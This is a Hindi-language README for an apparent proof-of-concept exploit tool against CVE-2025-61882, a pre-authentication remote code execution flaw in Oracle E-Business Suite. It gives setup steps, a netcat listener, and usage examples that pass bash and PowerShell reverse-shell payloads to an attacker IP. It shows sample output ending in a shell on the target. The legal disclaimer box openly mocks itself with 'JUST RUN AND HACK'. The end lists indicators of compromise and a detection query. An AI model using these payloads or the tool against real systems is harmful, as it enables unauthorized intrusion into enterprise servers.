
CVE-2025-61882 के लिए एक शोषण, जो Oracle E-Business Suite में एक महत्वपूर्ण pre-auth RCE है। यह unauthenticated remote code execution के लिए SSRF, CRLF injection, HTTP smuggling, और XSLT injection को जोड़ता है।
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨 ║
║ ║
║ By using this tool, you acknowledge and agree that: ║
║ ║
║ ║
║ FCK THIS JUST RUN AND HACK ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
CVE-2025-61882 के लिए सुरक्षा परीक्षण उपकरण, जो Oracle E-Business Suite को प्रभावित करने वाली एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन कमज़ोरी है।
निर्माता: Mindflare
CVE-2025-61882 एक परिष्कृत शोषण श्रृंखला है जो पाँच अलग-अलग कमज़ोरियों को जोड़ती है:
/OA_HTML/configurator/UiServlet के माध्यम से सर्वर-साइड रिक्वेस्ट फोर्जरीreturn_url पैरामीटर में HTTP हेडर इंजेक्शन/OA_HTML/help/../ उपसर्ग के माध्यम से पथ ट्रैवर्सल# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# Install dependencies
pip3 install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
एक अलग टर्मिनल में, netcat लिसनर शुरू करें:
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
मूल उपयोग (लिनक्स लक्ष्य):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
विंडोज़ लक्ष्य:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
| पैरामीटर | विवरण | आवश्यक | उदाहरण |
|---|---|---|---|
--target | लक्ष्य Oracle EBS URL | हाँ | http://192.168.1.22:8000 |
--lhost | आपका IP पता (कॉलबैक के लिए) | हाँ | 192.168.1.10 |
--lport | HTTP सर्वर पोर्ट (XSL पेलोड प्रदान करता है) | हाँ | 80 या 8080 |
--command | लक्ष्य पर निष्पादित करने का कमांड | हाँ | ऊपर उदाहरण देखें |
--platform | लक्ष्य OS: linux या windows | हाँ | linux |
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
नेटवर्क IOC:
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
HTTP पैटर्न:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jspशैक्षिक उपयोग प्रतिबंधों के साथ MIT लाइसेंस - LICENSE देखें
अस्वीकरण: यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच गैरकानूनी है। लेखक दुरुपयोग के लिए कोई देयता नहीं मानता।
निर्माता: Mindflare | अंतिम अद्यतन: अक्टूबर 2025